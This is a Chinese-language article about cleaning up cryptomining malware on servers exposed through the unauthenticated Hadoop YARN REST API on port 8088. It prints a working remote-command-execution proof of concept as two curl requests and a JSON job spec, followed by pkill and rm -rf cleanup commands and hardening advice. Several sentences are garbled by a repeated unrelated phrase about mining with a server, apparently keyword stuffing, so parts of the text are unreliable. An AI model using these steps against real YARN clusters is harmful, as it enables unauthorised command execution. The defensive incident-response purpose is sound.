服务器挖矿后如何排查

挖矿会消耗大量的服务器硬件资源，例如 CPU 和内存。但是如何用服务器挖矿，运维人员应对挖矿攻击最头疼的就是不干净。实际上，挖矿攻击成功的主要方式是通过服务器安装外部RestAPI由第三方工具进行。如果这些第三方工具的API存在漏洞，那么在很大程度上会受到黑客利用开放端口的攻击。<​​/p>

攻击步骤：

1.申请新的申请

直接通过 curl POST 请求

curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

返回内容类似：

{"application-id":"application_1527144634877_20465","maximum-resource-capability":{"memory":16384,"vCores":8}}  

2.构造并提交任务

构造json文件1.json，内容如下，其中application-id对应上面得到的id，命令内容是尝试在/var/tmp目录下创建一个11112222_test_111122222文件，和内容也是111：

{  
    "am-container-spec":{  
        "commands":{  
            "command":"echo '111' > /var/tmp/11112222_test_11112222"
        }  
    },  
    "application-id":"application_1527144634877_20465",  
    "application-name":"test",  
    "application-type":"YARN"  
}  

然后直接

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json

可以完成攻击，执行命令，对应目录下可以看到对应文件

处理方式：

1.pkill -f cryptonight  
2.pkill -f sustes  
3.pkill -f xmrig  
4.pkill -f xmr-stak  
5.pkill -f suppoie  
6.ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9  
7.ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9  
8.rm -rf /var/tmp/pscf*  
9.rm -rf /tmp/pscf*

清除病毒

使用top查看进程，杀死异常进程，查看/tmp和/var/tmp目录，删除java、ppc、w.conf等异常文件查看crontab任务列表，删除异常任务并查看YARN日志，确认应用异常，删除处理

安全加固

通过iptables或安全组配置访问策略，限制对8088等端口的访问。如无必要，请勿打开公网接口。相反如何用服务器挖矿，使用本地或 Intranet 调用将 Hadoop 升级到 2.x 版本或更高版本。并开启Kerberos认证功能，禁止匿名访问云镜像。目前支持该漏洞的检测，也支持挖矿木马的发现。建议安装云镜像并打开专业版及时发现并修复漏洞或在中马之后及时接收。提醒止损

最后检查/var/spool/cron/crontabs/root定时任务是否被字符串修改